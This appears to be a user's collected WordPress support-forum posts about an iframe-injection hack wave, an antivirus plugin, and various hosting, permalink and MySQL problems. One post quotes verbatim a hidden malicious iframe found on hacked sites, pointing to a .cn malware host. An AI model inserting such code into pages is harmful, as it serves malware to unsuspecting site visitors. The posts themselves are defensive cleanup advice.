WebFadds

Hello WordPress Managers –

I have used the plugin on about 30 installations of WordPress we manage, and it is not “fishy”. Instead, it has caught real viruses and helped reveal the code — especially in Summer of 09 when a lot of WP sites were hit. Don’t you think if the plugin was suspicious as wpsquadser alleges, it would be removed from the database here?

It does sometimes find unknown code and mistakenly identify it as a Virus. I did a custom homepage with some AJAX calls for a slideshow, and it found those. But that’s good. You just have to know what you’re looking at.

– Scott

Hi Gariben –

I have FileZilla, but was not using it. Was using Fetch (a Mac based FTP program). Why do you think Adobe Reader 8.0 was involved?

UPDATE: After cleaning the index.php files on the infected systems, changing passwords, and installing the antivirus plugin reported above, have had no more incidents of the attack.

– Scott

Hello –

Good news all… one of our colleagues in the battle has programmed a new plugin, which specifically scans and checks for iframes:
https://www.ads-software.com/extend/plugins/antivirus/ – released 6/18

I am using it and will report here. Your experiences and reports will help too.

– Scott

Hello –

UPDATE: I have had this problem now on abou 5 sites in the last week, and also discovered iframe insertion hack in the default-filters.php file in the wp-includes file.

All team members have swept their own PCs and not found anything related.

We are proceeding to sweep hosting servers and change FTP passwords.

– Scott

Hi –

I am having a similar problem — seems iframe hacks are happening often (found 80 references on these boards). The code on my sites (more than one site) was:

<iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

Here are the steps I am taking:

• Clean my own computer and team workers computers with anti-virus software
• Remove all malicious iframe codes and look for odd software on the hosting server and remove it
• Change account passwords for Control Panel and FTP
• Double check all security settings — see CODEX on Security

It will help us if you update anything you learn here, and also on a thread I started here: https://www.ads-software.com/support/topic/281767?

Thanks, and good luck.

– Scott

Hi –

I am having a similar problem now with an iframe hack attack. I don’t think it is related to WP version, but that it is some kind of program that gains access to your FTP password, then places iframe code in all files named index. Have a look at the following thread — there are references to a couple of other threads there that could help you, and I could use your help in reporting what you learn. What was in your iFrame code?

See: https://www.ads-software.com/support/topic/281767?
– Scott

Hello Pense –

I co-developed the plugin with Antonie Potgeiter. If you return, please give a few more details about what you would like to see. We plan to do more updates soon.

– Scott
WebFadds.com

Hello Joni & All –

Hey… no “legwork” required. Just mention a site here, as Zedesino did, and I will do the contact, writing, and editing (and hopefully catch the difference between “right” versus “write”).

We changed the link to the series: WordPress CMS Reviews

Contacting Zedesino now.

– Scott

Hi There –

The answer depends on both how your web hosting server sets up the “add-on” domain, and what (if anything) changes you have made to your directory structure on your web hosting server.

1. If your hosting company allows you to separately host a new domain on your plan, then the address should be simply: https://www.teofilstudios.com

2. If you have set up a subdirectory for the new domain, named “wordpress”, but your company still allows treatment of this domain separately from your first domain, then Samboll is correct, and it would be:
https://www.teofilstudios.com/wordpress

Judging from the failure of your first guess presented above, and from the fact that your domain functions as a Top Level Domain would when I go to it in my browser, I am guessing that #1 is the case.

– Scott

Hello Rhodz & All –

There’s a potentially deeper issue here. I had the same problem, and my hosting tech. discovered that, depending on the number of URLs involved with the permalink change, changing permalinks (I’m using WP 2.5) could cause Apache to trigger a 500 Internal Server Error due to a “maximum redirects reached” setting within Apache. Your Hosting Tech. can change that for you, but I don’t believe it can be done via “WHM” on a Virtual Private Server. Server needs to be restarted after the change.

THEN: After restart, still had error, so turned off all plugins, deleted htaccess file, reinstalled WordPress (after back-up), and made sure new (blank) htaccess file was uploaded and writable (chmod). THEN… and only then… problem resolved.

Hope this helps.

Moderator — I’m not sure how WordPress PHP talks to Apache… but maybe this can be addressed by the core team.

– Scott
WebFadds.com

Hi –

RESOLVED.

FYI… the issue was not the “four things” mentioned above:

1. The name of the database
2. Your MySQL username
3. and password
4. Database values

It was the permissions on the MySQL server which was set-up customized and in an unusual configuration (no PHPmyadmin, etc.). The host operators did not know how to deal with it, so they gave us access. We resolved it by setting permissions (‘localhost’ — not ‘synux.sqlserverdomain.com’) ourselves.

Thanks –
Scott

Hi –

Problem is, I’ve already tried the two things you suggested:
1) use: synux.sqlserverdomain.com
2) Contact host (they don’t have anyone that knows how their server is set up to connect to MySQL — go figure).

Will do some more hunting through forums. No problems installing on normally configured hosts all the time. This one is a bit peculiar.

Thanks – Scott

Hello Mreider –

When you install WordPress, you would need to install it in the top level directory for your site, and make its home page the home page of your site. Then you would get the first part of your solution — mysite.com would launch into WordPress.

You would have to do that, using your example, if you want to set up a linking structure that starts at mysite.com, and then goes to page (mysite.com/thispage) with a sub-page (mysite.com/thispage/thispage.shtml), like you want.

I am thinking that you instead set up WordPress in its own directory (mysite.com/WordPress/) which is the root of why you can’t get what you want.

If I guessed wrong, and you DID install WordPress in your top level directory on your server then you solution can be as simple as creating a sub-page for the page you want.

Best…

– Scott
Scott Frangos
[sig moderated]

Hi –

Not sure what you are asking. Did you purchase a TLD (Top Level Domain), like a .com, .org., or .net? If that is the case, then you simply log into where you purchased it (Yahoo?) and give them the domain name servers (DNS) for your new location. Sorry about the TLA’s (Three Letter Acronyms) — seems to be a lot of them in this biz.

Best…

– Scott
Scott Frangos
[sig moderated]

Hello ghporras –

I looked at your blog, and the first part of what you are asking WordPress to do — display the year / then the month number, appears to be working fine. Clicking on your “Archives” link, I see:
ghporras1.mysite4now.net/2006/12

Do you have a post you have actually written and published? I did not see any at your blog. Write a test post and then see what appears for the URL.

Best…

– Scott
Scott Frangos
[sig moderated]